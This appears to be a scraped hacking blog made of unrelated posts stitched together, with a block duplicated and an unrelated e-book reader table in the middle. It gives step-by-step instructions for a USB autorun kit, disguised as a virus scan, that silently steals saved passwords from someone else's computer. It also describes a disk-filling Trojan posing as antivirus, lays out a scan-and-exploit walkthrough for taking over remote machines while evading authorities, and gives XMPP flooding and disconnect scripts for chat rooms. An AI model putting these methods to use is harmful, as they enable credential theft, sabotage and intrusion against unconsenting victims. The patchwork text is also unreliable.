How to Hack Passwords Using Pen Drive




Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer.
We need the following tools to create our rootkit:


MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedure to create the password hacking toolkit:
NOTE: You must temporarily disable your antivirus before following these steps. This hack works on . This procedure will only recover the stored passwords (if any) on the Computer. Some versions of FireFox don't store passwords.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps:
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

Download Mobipocket Reader for reading ebooks in Mobiles

see: http://www.techrecipe.co.cc/2009/01/installing-ebooks-in-mobiles.html

For MacOs, Linux or non-supported Windows users
:
Mobipocket Reader is not supported on Mac or Linux systems, but you can install Mobipocket Reader on your PDA/smartphone via a Mac or Linux by downloading an individual installation package for your device:
Download the Reader software for PDA/smartphone without the PC installer
PlatformVersionLinkDetails
Blackberry6.0.76mobireaderBlackberry.zip RIM Blackberry
EpocR54.8.413mobireader.epoc.5.sis Psion
Franklin UA0.0.0
Franklin BSI-1900
HPC4.8.413mobireader_hpc.arm.cab Windows CE HPC and Jupiter platofmrs (ARM processors)
HPC4.8.413mobireader_hpc.mips.cab Windows CE HPC and Jupiter platofmrs (MIPS processors)
HPC4.8.413mobireader_hpc.sh3.cab Windows CE HPC and Jupiter platofmrs (SH3 processors)
OldWindowsMobile4.9.446mobireader_us.arm.cab Microsoft Windows Mobile, Pocket PC, Pocket PC phone edition (ARM processor, old devices)
OldWindowsMobile4.9.446mobireader_us.mips.cab Microsoft Windows Mobile, Pocket PC, Pocket PC phone edition (MIPS processor, old devices)
OldWindowsMobile4.9.446mobireader_us.sh3.cab Microsoft Windows Mobile, Pocket PC, Pocket PC phone edition (SH3 processor, old devices)
OldWindowsMobilePhone4.8.413mobireader_us.smartphone.arm.cab Microsoft Smartphone (old devices)
Palm5.3.582mobireader.prc mathlib.prc bluepalm.pdb Palm One - Sony Clie - Garmin iQue - Tapwave Zodiac
Series60.15.3.581mobireader.series60.1.sis Nokia 3600/3620/3650/3660/6600/7650/N-Gage/N-Gage QD - Siemens SX1
Series60.25.3.581mobireader.series60.2.sis Nokia 3230/6260/6620/6630/6670/6680/6681/6682/7610/N70/N72/N90
Series60.35.3.576mobireader.series60.3.sis Nokia 3250/5500/E50/E60/E61/E62/E70/N71/N73/N75/N80/N91/N92/N93/N93i/N95
Series80.15.3.582mobireader.series80.1.sis Nokia 9210/9290
Series80.25.3.582mobireader.series80.2.sis Nokia 9300/9500
Series90.15.3.582mobireader.series90.1.sis Nokia 7710
UIQ.25.3.582mobireader.uiq.2.sis Sony Ericsson P800/P900/P910 - Motorola A920/A925/A1000/M1000 - BenQ P30
UIQ.35.2.550mobireader.uiq.3.sis Sony Ericsson M600/P990/W950
WindowsMobile4.9.446mobireader_us.mips.cab Microsoft Windows Mobile, Pocket PC, Pocket PC phone edition (MIPS processor)
WindowsMobile4.9.446mobireader_us.sh3.cab Microsoft Windows Mobile, Pocket PC, Pocket PC phone edition (SH3 processor)
WindowsMobile5.3.582mobireader.arm.cab Microsoft Windows Mobile, Pocket PC, Pocket PC phone edition (ARM processor)
WindowsMobilePhone5.3.582mobireader.smartphone.arm.cab Microsoft Smartphone

How to Make a Trojan Horse

Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run.  Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The Trojan is available for download along with the source code at the end of this post. Let’s see how this Trojan works…
Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.
Now lets move to the working of our Trojan
The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in theWindowsSystem32 folder with the .dll extension. Since the junk file has the .dllextention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.
The algorithm of the Trojan is as follows
1. Search for the root drive
2. Navigate to WindowsSystem32 on the root drive
3. Create the file named “spceshot.dll
4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full
5. Once the drive is full, stop the process.
You can download the Trojan along with it’s source code HERE.
How to compile, test and remove the damage?
Compilation:
You can use Borland C++ compiler (or equivalent) to compile the Trojan.
Testing:
To test the Trojan,  just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.
NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.
How to remove the Damage and free up the space?
To remove the damage and free up the space, just type the following in the “run” dialog box.
%systemroot%system32
Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.
NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file ?

Getting IP Address of victim computer to hack/access computer remotely


n my previous post Tutorial: How to hack remote computer using IP Address,, I have mentioned method used to hack victim computer provided you have his computer IP Address. I received immediate response from readers asking me to post the methods used to know IP address computer. Hence, i have mentioned over here the popular methods used to hack and find IP Address of victim computer so that you can apply hacking trick mentioned in my previous post mentioned above. The tutorial also mentions about obtaining IP Address of victim computer over msn.

Getting Ip Address:-

To see the ip all computers you are connected to (web servers, people attempting to hack into your computer).
Go to dos (start>run>type command) and run the netstat command. Type netstat /? for details.
Type netstat -r at the command prompt to see the ip of all computers you are connected to

In MSN (and other programs) when you are chatting to someone everything you type goes through the MSN servers first (they act as a proxy) so you see their ip rather than who you are chatting to. You can get round this by sending them a file as MSN doesn't send file through its proxy.


When you type the netstat -r (or -a for a different view) the ip's are under the foreign address table. The ports are separated by a : . Different programs use different ports, so you can work out which ip's are from which program.
Connecting to other computers and what ports are:--

Servers send information. Clients retrieve. Simple.
Windows comes with a built in program to connect to other computers called telnet.
To start Windows Telnet Start menu> Run> type Telnet. Click connect> remote system
Ports are doors into computers. Hosts are computer names
(ip number or a name that is translated into the ip automatically)
Different programs open different ports, but they always open the same ports so other computers know which port to connect to. You can get a port list listing all the different ports, but a basic one is:
11 :- Sends info on the computer
21 :- FTP (File transfer program)
23 :- Telnet (Login to the computers command line)
25 :- Smtp (Sends mail)
80 :- Http (Web pages)
There are thousands of different programs using different ports. You can get programs called port scanners which check a computer for all ports up to a certain number, looking for ways in. You can port scan a computer looking for ways-in.
Anyway, back to telnet.
Type http://www.yahoo.com as the host and port as 80 the click connect.
If nothing happens, you're in. Wow. You are connected to Yahoo's server.
You can now type http commands (you are connected to an http server, so it supports http commands). Ie. on an ftp server you can type open and it will do something. On an http server it will just wonder what the hell you are on about.
Type get / http/1.0 then press enter twice to get the file on the server at / (try /index.html) etc.)
Allowing dos and regedit in a restricted Windows

A very simple tactic I found after accidentally locking myself out of dos and regedit is to open notepad and type the following:
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]
"Disabled"=dword:0
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:0

Save it as something.reg then run it. Simple.

Making non deletable, unreadable folders

Tested on Windows 95/98:

By holding down alt, then typing numbers on the number pad (right of the keyboard) you can create special characters. If you hold down alt, then press 1, then let go, you got the ascii character 1. You try some random numbers. This goes all the way up to 255. Open a dos prompt, and type md (alt+1+9+4)some word. md is the dos command to make a directory, now try and open the directory in Windows, you can't. To open it, type ren (alt+1+9+4)some word some word (ren is the dos command to rename)

Proxies

Proxies are computers that you connect through, hiding your computer. Most aren't anonymous, they give away your ip. Some are. Good anonymous proxies: mail.uraltelecom.ru:8080 and 194.247.87.4:8080.
Different programs require different ways of using proxies. To do it in internet explorer 5 go to tools, internet options, connections, settings. In the above proxies they are in the format host:port

Password files:

If you lock yourself out of Windows stuff, all passwords are stored in files called *.pwl in C:windows. In Unix, passwords are normally stored at etc/passwd. This can be viewed using the cat command (prints a file to screen): cat etc/passwd. Make sure you're passwords are shadowed (not actually in etc/passwd). Also make sure they aren't in a file called shadow, especially not in a file called etc/shadow.
Unix passwords are encrypted far better than Windows one's (to be fair, Windows 95 isn't designed for users), but can still be cracked through a program called jon.

Securing your website:

Ftp Ftp is how you upload your web site, if someone finds out the password they can add/ delete anything. Brute forcing is the most common ftp attack, where a program guesses every possible combination (or from a list of words). An eight letter alpha-numeric word is almost impossible to crack, as the process is slow.
The real problem is with server side scripting. Pages other than plain html (ie. pages that perform commands on the host) are a security risk. The main problems are scripts that write to pages (guest books etc.). If when the guest book is viewed it has a .shtml extension, then it can execute commands.

So friends....i have tried my best to inform you about the methods used to hack computer remotely using victim computer by using IP Address. The tutorial thus explains all ways used to obtain IP Addresses of computer you want to hack remotely and access it data/database.

How to hack remote computer using IP Address

You can get the IP address of the victim using this post.
Now, what do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.

1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.

Example 1:
Idlescan using Zombie (192.150.13.111:80); Class: Incremental
Interesting ports on 208.225.90.120:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
135/tcp open loc-srv
443/tcp open https 1027/tcp open IIS
1030/tcp open iad1
2306/tcp open unknown
5631/tcp open pcanywheredata
7937/tcp open unknown
7938/tcp open unknown
36890/tcp open unknown


In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc...) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we don't even know what type of software or what operating system that this system is running.

2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences.

So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons and many of you havent even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.
So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25' This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information youve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25.


220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400


Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8' Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Bannners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples email. Well now back to the task at handu. Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.securityfocus.com is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.

At SecurityFocus you can search through vendor and whatnot to try and find your peice of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window thats currently open was opened as root. The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a fucking jerk, however I dont recommend that. Maybe leave a text file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.

There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasnt the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the victim will enter http://www.bank.com and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really http://www.bank.com. You need to have a small script set up so it will automatiically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the victim doenst give it a second thought and will simply try again later.
__________________________________________________ _______o_________

So as a summary of how to 0Wn a box when you only have an IP Address
Method Works On BOTH *Nix and Windoze

****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.****

- Port Scan The Address And Record Open Ports
- Telnet To Open Ports To Identify Software Running On Ports

3) netcat - Network swiss army knife. Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports

- Record Banners And Take Note Of The Application Running and The Version Number
- Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any vulnerabilities then search google.
- Make a copy of some Proof-Of-Concept code for the vulnerability.

*Read the documentation if there is any, for the proof-of-concept code you will be using for your exploit*

- Run The Exploit Against The Victim.
- Reap The Cheap-Sh0t Ownage

So guys...i hope you now know how to hack into a computer using a known IP Address. Once you get IP Address of the victim, you are able to access and hack the computer remotely as described in the post.
Credit: Codine.

Create Anti-Kick Or Hanging Id Room New Nimbuzz Update

Antikik 1.First delet ur room ( entr room from nimbuzz ..then make
unprsistent from bmbus then l3ft room from nimbuzz and enter again.. u
will get msg this room doesnt exist any more) 2.Recreate the room from
nimbuzz.. 3.Left the room from nimbuzz and book mark it in bombus
4.Now configure it using bookmarks ... unmark prsistnt and send
...then config again mark prsistnt and send. 5.Repeat step 4(just
above step) 12times using bookmarks configon bombus.. 6.Then enter
left the room 7 times i.e( entr lft,entr lft,entr lft.entr lft.entr
lft.entr lft.entr lft.) 7.Hang id into room from baby ngiler or any
othr floodr.. 8.entr room from nimbuzz wait 20mints the hang id will
not get autokik..:d:d SYMBIAN DC CODE(NEW)By~Almamun55. <iq
from="yourid@nimbuzz.com/sp"to="targetid@nimbuzz.com/Nimbuzz_Symbian137"
id="getros"type="result"><queryxmlns="jabber:iq:roster"></query></iq>
you have old 2 scripts? >>if u want room anti kick Fast>use:2number
scripts delet room 3time send >>then use:number1 scripts create room
1time send >then use:3time enter left normal java or symbian Then 1
jid hang in room and finish your room anti kick :) HIDE YOUR MOBILE
DISCRIPTION IN CLIENT VERSION�B. Almamun55. (.1.) Go to tool then
click on option.(.2.) There you will see SHARED PLATFORM INFO unmark
it.(3.)Save and relogin your Account. . DC SYMBIAN CODE <br/><iq
to="TARGET_ID@nimbuzz.com/Nimbuzz_Symbian621" id="getros"
type="result"><query xmlns="jabber:iq:roster"></query></iq> ADD ROSTER
WIHT XML <presence to="TARGET_ID@nimbuzz.com"
type="subscribe"/><presence to="TARGET_ID@nimbuzz.com"
type="unsubscribe"/> DC BOMBUS CODE BY Almamun55 <iq
to="ROOM_NAME@conference.nimbuzz.com/RESRC" type="get"
id="ROOM_NAME@conference.nimbuzz.com/RESRC"><كون
xmlns="vcard-temp"/></iq> CHANGE SUBJECT ROOM BY Almamun55 <message
to="ROOM_NAME@conference.nimbuzz.com"
type="groupchat"><subject>http://www.bdnimbuzz.hexat.com</subject><body>BD
:D Haz CHange THe Subject To:amin..1</body></message> PRIVATE CHAT
WIHT XML <message to="TARGET_ID@nimbuzz.com/RESRC"
type="chat"><body>:DYou :DWill :Ddc :DBy amin..1:lol:</body><x
xmlns="jabber:x:event"></x></message>// CHECK CLIENT VERSION>BY
AMIN..1 <iq to="TARGET_NAME@nimbuzz.com/RESRCE" type="get"
id="getver"><query xmlns="jabber:iq:version"/></iq> Hang jid easily
with script in room~by LOVE_KINGBD. <presence
to="ROOM~NAME@conference.nimbuzz.com/username"
type="error"><status></status></presence> XML Code For Flood PV (DC)
Room Users - NEW~BY LOVE_KINGBD. <message to="ROOM
NAME@conference.nimbuzz.com/TARGET-ID" type="chat"
id="-486868572"><body>GOODZILA.TK - YOUR PM!</body><active
xmlns="http://jabber.org/protocol/chatstates"/></message> Change your
client version topc~BY LOVE_KINGBD. <iq to="id@nimbuzz.com/nimbuzz
midp" type="result" id="getver"><query
xmlns="jabber:iq:version"><name>home</name><version>123456</version><os>pc
version</os></query></iq> He Makes 2K/Day At Home! Learn How

Create Anti-Kick Or Hanging Id Room New Nimbuzz Update

Antikik 1.First delet ur room ( entr room from nimbuzz ..then make
unprsistent from bmbus then l3ft room from nimbuzz and enter again.. u
will get msg this room doesnt exist any more) 2.Recreate the room from
nimbuzz.. 3.Left the room from nimbuzz and book mark it in bombus
4.Now configure it using bookmarks ... unmark prsistnt and send
...then config again mark prsistnt and send. 5.Repeat step 4(just
above step) 12times using bookmarks configon bombus.. 6.Then enter
left the room 7 times i.e( entr lft,entr lft,entr lft.entr lft.entr
lft.entr lft.entr lft.) 7.Hang id into room from baby ngiler or any
othr floodr.. 8.entr room from nimbuzz wait 20mints the hang id will
not get autokik..:d:d SYMBIAN DC CODE(NEW)By~Almamun55. &lt;iq
from=&quot;yourid@nimbuzz.com/sp&quot;to=&quot;targetid@nimbuzz.com/Nimbuzz_Symbian137&quot;
id=&quot;getros&quot;type=&quot;result&quot;&gt;&lt;queryxmlns=&quot;jabber:iq:roster&quot;&gt;&lt;/query&gt;&lt;/iq&gt;
you have old 2 scripts? >>if u want room anti kick Fast>use:2number
scripts delet room 3time send >>then use:number1 scripts create room
1time send >then use:3time enter left normal java or symbian Then 1
jid hang in room and finish your room anti kick :) HIDE YOUR MOBILE
DISCRIPTION IN CLIENT VERSION�B. Almamun55. (.1.) Go to tool then
click on option.(.2.) There you will see SHARED PLATFORM INFO unmark
it.(3.)Save and relogin your Account. . DC SYMBIAN CODE <br/><iq
to="TARGET_ID@nimbuzz.com/Nimbuzz_Symbian621" id="getros"
type="result"><query xmlns="jabber:iq:roster"></query></iq> ADD ROSTER
WIHT XML <presence to="TARGET_ID@nimbuzz.com"
type="subscribe"/><presence to="TARGET_ID@nimbuzz.com"
type="unsubscribe"/> DC BOMBUS CODE BY Almamun55 <iq
to="ROOM_NAME@conference.nimbuzz.com/RESRC" type="get"
id="ROOM_NAME@conference.nimbuzz.com/RESRC"><كون
xmlns="vcard-temp"/></iq> CHANGE SUBJECT ROOM BY Almamun55 <message
to="ROOM_NAME@conference.nimbuzz.com"
type="groupchat"><subject>http://www.bdnimbuzz.hexat.com</subject><body>BD
:D Haz CHange THe Subject To:amin..1</body></message> PRIVATE CHAT
WIHT XML <message to="TARGET_ID@nimbuzz.com/RESRC"
type="chat"><body>:DYou :DWill :Ddc :DBy amin..1:lol:</body><x
xmlns="jabber:x:event"></x></message>// CHECK CLIENT VERSION>BY
AMIN..1 <iq to="TARGET_NAME@nimbuzz.com/RESRCE" type="get"
id="getver"><query xmlns="jabber:iq:version"/></iq> Hang jid easily
with script in room~by LOVE_KINGBD. <presence
to="ROOM~NAME@conference.nimbuzz.com/username"
type="error"><status></status></presence> XML Code For Flood PV (DC)
Room Users - NEW~BY LOVE_KINGBD. <message to="ROOM
NAME@conference.nimbuzz.com/TARGET-ID" type="chat"
id="-486868572"><body>GOODZILA.TK - YOUR PM!</body><active
xmlns="http://jabber.org/protocol/chatstates"/></message> Change your
client version topc~BY LOVE_KINGBD. <iq to="id@nimbuzz.com/nimbuzz
midp" type="result" id="getver"><query
xmlns="jabber:iq:version"><name>home</name><version>123456</version><os>pc
version</os></query></iq> He Makes 2K/Day At Home! Learn How